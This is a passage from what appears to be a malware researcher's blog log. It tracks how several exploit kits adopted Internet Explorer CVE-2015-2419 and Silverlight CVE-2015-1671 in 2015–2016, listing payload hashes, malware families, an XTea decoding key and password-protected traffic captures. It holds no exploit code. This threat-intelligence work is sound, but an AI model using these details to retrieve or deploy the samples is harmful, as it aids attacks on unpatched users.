escalation has been associated to flash Exploit as well.2015-08-23Files : CVE-2015-2419 pass (password: malware)CVE-2015-5122 pass featuring CVE-2015-2426 (password : malware)Thanks :Horgh_RCE , EKWatcher and Will Metcalf for their helpNuclear Pack:2015-08-23Nuclear Pack exploiting IE11 in Win7 with CVE-2015-2419 to push TeslaCrypt2015-08-23Files :  Fiddler (Password is malware)Neutrino :CVE Identification by Timo HirvonenNeutrino successfully exploiting CVE-2015-2419 on IE11 in Windows 72015-08-27(Out of topic payload : c7692ccd9e9984e23003bef3097f7746  Betabot)Files: Fiddler (Password is malware)RIG:2015-08-27RIG successfully exploiting CVE-2015-24192015-08-27(Out of topic payload : fe942226ea57054f1af01f2e78a2d306 Kelihos (kilo601)Files : Fiddler (password is malware)Hunter :2015-08-27@hunter_exploit 2015-08-26As spotted by Proofpoint Hunter EK has integrated CVE-2015-2419Hunter Exploit Kit successfully exploiting CVE-2015-24192015-08-27Files : Fiddler (password is malware)Kaixin :2016-01-08Files: Fiddler here (password is malware)( out of topic Payload : bb1fff88c3b86baa29176642dc5f278d firing PCRat/Gh0st ET rule 2016922 )Sundown :2016-07-06 - Thanks  Anton Ivanov (Kaspersky) for confirmationSundown successfully Exploiting CVE-2015-2419 - 2016-07-06cmd into wscript into Neutrino-ish named / RC4ed Payload let think this is a Rip from Neutrino implementation( Out of topic payload: bcb80b5925ead246729ca423b7dfb635 is a Netwire Rat )Files : Sundown_CVE-2015-2419_2016-07-06 (password is malware)Read More :Hunter Exploit Kit Targets Brazilian Banking Customers - 2015-08-27 - ProofpointCVE-2015-2419 – Internet Explorer Double-Free in Angler EK - 2015-08-10 - Sudeep Singh, Dan Caselden - FireEye2015-08-10 - ANGLER EK FROM 144.76.161.249 SENDS BEDEP This pass shared by Brad from Malware-Traffic-Analysis is including the CVE-2015-2419Generic bypass of next-gen intrusion / threat / breach detection systems - 2015-06-05 - Zoltan Balazs - EffitasPost publication Reading :Attacking Diffie-Hellman protocol implementation in the Angler Exploit Kit - 2015-09-08 Kaspersky

Patched with ms15-044 CVE-2015-1671 is described as TrueType Font Parsing Vulnerability.Silverlight up to 5.1.30514.0 are affected, but note : most browser will warn that the plugin is outdatedOut of date Plugin protection in Chrome 39.0.2171.71Out of date ActiveX controls blocking in Internet Explorer 11(introduced in August 2014)and also consider that Microsoft announced the end of Silverlight at beginning of the month.Angler EK :2015-07-21Around the 1st of July some new Silverlight focused code appeared in Angler EK landing.It even seems coders made some debug or something wrong as you could see this kind of popup several hours long on Angler EK.Deofuscated snipet of Silverlight call exposed to Victims in Angler EK2015-07-02I failed trying to get something else than a 0 size silverlight calls.I heard about filled calls from Eset and EKWatcher.The exploit sent was 3fff76bfe2084c454be64be7adff2b87  and appears to be a variation of CVE-2015-1671 (Silverlight 5 before 5.1.40416.00).  I spent hours trying to get a full exploit chain....No luck. Only 0size calls.But, it seems it's back today (or i get more lucky ? ) :--Disclaimer : many indicators are whispering it's the same variation of CVE-2015-1671, but I am still waiting for a strong confirmation--Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in IE 11 on Windows 72015-07-21Silverlight 5.1_10411.0 exploited by Angler EK via CVE-2015-1671 in Chrome 39 on Windows 72015-07-21Silverlight 5.1.30514.0 exploited by Angler EK via CVE-2015-1671 in Firefox 38 on Windows 72015-07-21Two x86 - x64 dll are encoded in the payload stream with XTea Key : m0boo69biBjSmd3pSilverlight dll in DotPeek after Do4dotSample in those pass : ac05e093930662a2a2f4605f7afc52f2(Out of topic payload is bedep which then gather an adfraud module - you have the XTea key if you want to extract)Files: Fiddler (password is malware)[Edit : 2015-07-26, has been spread to all Angler Threads]Thanks for help/tips :Eset, Microsoft, Horgh_RCE,  Darien Huss, Will Metcalf, EKWatcher.Magnitude :2015-07-28  has been spotted by Will Metcalf in MagnitudeIt's a rip of Angler's oneSilverlight 5.1.30514.0 exploited by Magnitude2015-08-29Files: Fiddler (password is malware)Read more :CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits - 2013-11-13